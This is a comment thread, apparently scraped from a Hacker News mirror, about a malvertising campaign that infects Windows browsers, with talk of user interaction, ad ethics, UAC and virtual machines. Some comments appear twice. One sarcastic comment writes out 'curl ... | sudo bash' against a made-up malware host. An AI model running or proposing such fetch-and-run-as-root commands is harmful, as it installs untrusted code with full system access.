The article leaves it open whether the user needs to double-click the malicious file or whether it is executed without user interaction through some exploit.
"drive-by download" _usually_ refers to the latter, but the rest of the article not being more explicit and the use of legit-sounding file names makes me think that this may be just another attempt to make non-news appear interesting.
Not really the article's fault. As they state near the end, Microsoft themselves didn't provide this info.
> Thursday’s [Microsoft] post doesn’t explicitly say what, if any, user interaction is required for infections to occur. It’s also not clear what effect defenses like User Account Control have. Microsoft makes no mention of the attack hitting browsers running macOS or Linux, so it's likely this campaign affects only Windows users. Microsoft representatives didn’t respond to an email asking for details.
It is still the articles fault for existing at all. The behaviour of the payload is not very interesting or helpful and you have to read almost the entire article to discover that you have wasted your time.
It's like those "oh my god new Android malware is eating the world" articles that just casually say "after the user installs the apk and gives it device admin permissions" as if it's not a barrier at all. Coincidently, these articles are usually written by anti-virus companies.
It's the line about dropping installer exe files into a directory which is where I stopped reading. This sounds like it needs user execution so isn't really anything new.
Penny Arcade is considering running ads again partly because, as they put it, "I seem to have found somebody that won't serve weird scripts to readers, which has the scent of progress."
They go on: "Because I hail from another era of Internet publishing, there are certain classes of ads that I'm uncomfortable with - of course, these are the most lucrative ones.". Hence the bind less profitable websites find themselves in.
Why are we not seeing more information from MS on this? Should they not explain exactly how it behaves, like if it requires user interaction to run or whatnot? I get that their policy is never to say anything meaningful unless its a marketing pitch, but this seems like the exact right time to be open and explain exactly what it does.
I will be down voted with this reddit-like comment but in other news running "curl http://getmesomemalware.com/ - | sudo bash" and then entering your password proves just how insecure Linux actually is.
It was a comment on "do stupid things, win stupid prizes." i.e. if you download random bits of code from suspicious websites and give it super user access, you're going to have a bad time.
Wonder if my use of ubo n noscript would protect from this? i'm trying to use a fedora kda linux box as my daily driver, but my windows 8 lappy still sits there to run thunderbird rules and onenote, so I'm half protected from an OS perspective I guess?
> you can run thunderbird on linux, copy your rules over.
Now there's a good idea. Going to research how to install Thunderbirdon Linux now. I've been a windows baby duck since I first used a computer in 2000 w/ Windows 2000 and so not having familiar creature comforts like thunderbird_setup.exe or even a "Program Files" folder is taking some getting used to.
Two of my desktop and one of my laptop PCS were hit recently and I was not aware who the most likely corporate or until I read this post. Strange thing, is that yesterday I started noticing the same pop-ups in my browser on my Android phone. I'm reinstalling Windows later today on all my three PCs and will be using virustotal religiously.
If you're not running javascript, probably. Better yet fire up a VM if you're heading into the nether-regions of the internet. Or there's also Sandboxie, anyone still use it and recommend?
As for me, I think that VM suggestion is a good idea. In theory I stay on the tech utopia cyberneighborhoods like Matrix forums, Fxtec forums, etc. but I figure banner ads can be found in the most unlikely places.
“On Edge, for instance, the malware modifies MsEdge.dll so that it turns off security controls that help detect unauthorized changes to the Secure Preferences file.”
How can malware tamper with a system DLL without code signing setting off alarms?
Readit News
"drive-by download" _usually_ refers to the latter, but the rest of the article not being more explicit and the use of legit-sounding file names makes me think that this may be just another attempt to make non-news appear interesting.
> Thursday’s [Microsoft] post doesn’t explicitly say what, if any, user interaction is required for infections to occur. It’s also not clear what effect defenses like User Account Control have. Microsoft makes no mention of the attack hitting browsers running macOS or Linux, so it's likely this campaign affects only Windows users. Microsoft representatives didn’t respond to an email asking for details.
Obligatory:
UAC is not a security feature: https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94...
And considering that UAC only protects against admin (aka root) access, this xkcd applies https://xkcd.com/1200/
the reporter should have known this
Ads could have been something that wasn't abusive but it took some pathological behavior from Google and Facebook to bring us the hell we have now.
They go on: "Because I hail from another era of Internet publishing, there are certain classes of ads that I'm uncomfortable with - of course, these are the most lucrative ones.". Hence the bind less profitable websites find themselves in.
https://www.penny-arcade.com/news/post/2020/12/09/gods
I will be down voted with this reddit-like comment but in other news running "curl http://getmesomemalware.com/ - | sudo bash" and then entering your password proves just how insecure Linux actually is.
Now there's a good idea. Going to research how to install Thunderbirdon Linux now. I've been a windows baby duck since I first used a computer in 2000 w/ Windows 2000 and so not having familiar creature comforts like thunderbird_setup.exe or even a "Program Files" folder is taking some getting used to.
As for me, I think that VM suggestion is a good idea. In theory I stay on the tech utopia cyberneighborhoods like Matrix forums, Fxtec forums, etc. but I figure banner ads can be found in the most unlikely places.
How can malware tamper with a system DLL without code signing setting off alarms?